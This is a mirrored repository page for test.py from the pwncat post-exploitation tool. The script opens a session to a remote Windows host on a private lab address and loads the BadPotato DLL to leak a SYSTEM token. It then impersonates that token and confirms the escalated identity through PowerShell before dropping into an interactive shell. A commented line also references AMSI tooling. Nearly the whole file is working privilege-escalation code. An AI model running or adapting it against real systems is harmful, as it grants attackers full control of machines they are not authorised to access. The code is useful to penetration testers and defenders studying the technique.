1
0
mirror of https://github.com/calebstewart/pwncat.git synced 2024-11-27 19:04:15 +01:00
pwncat/test.py
Caleb Stewart ac74c3d013 Cleaned up plugin system
- Added builtin plugin resolver
- Rolled base c2 dlls into plugin resolver
- Changed plugin location configuration from `windows_c2_dir` to `plugin_path`
2021-06-12 03:10:14 -04:00

56 lines
1.8 KiB
Python
Executable File

#!./env/bin/python
import json
import stat
import time
import subprocess
import pwncat.manager
import pwncat.platform.windows
# Create a manager
with pwncat.manager.Manager("data/pwncatrc") as manager:
# Tell the manager to create verbose sessions that
# log all commands executed on the remote host
# manager.config.set("verbose", True, glob=True)
# Establish a session
# session = manager.create_session("windows", host="192.168.56.10", port=4444)
session = manager.create_session("windows", host="192.168.122.11", port=4444)
# session = manager.create_session("linux", host="pwncat-ubuntu", port=4444)
# session = manager.create_session("linux", host="127.0.0.1", port=4445)
# session.platform.powershell("amsiutils")
try:
# Load the BadPotato plugin
session.log("leaking system token w/ BadPotato")
badpotato = session.platform.dotnet_load("BadPotato.dll")
# Call the method within the DLL to leak a system token
system_token = badpotato.get_system_token()
session.log(f"found system token: {system_token}")
session.log("impersonating token...")
# Impersonate the SYSTEM token
session.platform.impersonate(system_token)
# Checkout our active user through powershell
result = session.platform.powershell(
"[System.Security.Principal.WindowsIdentity]::GetCurrent().Name"
)
session.log(f"now running as: {result[0]}")
session.platform.refresh_uid()
session.log(session.platform.getuid())
session.log(session.find_user(uid=session.platform.getuid()))
except (
pwncat.platform.windows.ProtocolError,
pwncat.platform.windows.PowershellError,
) as exc:
session.log(f"badpotato failed: {exc}")
manager.interactive()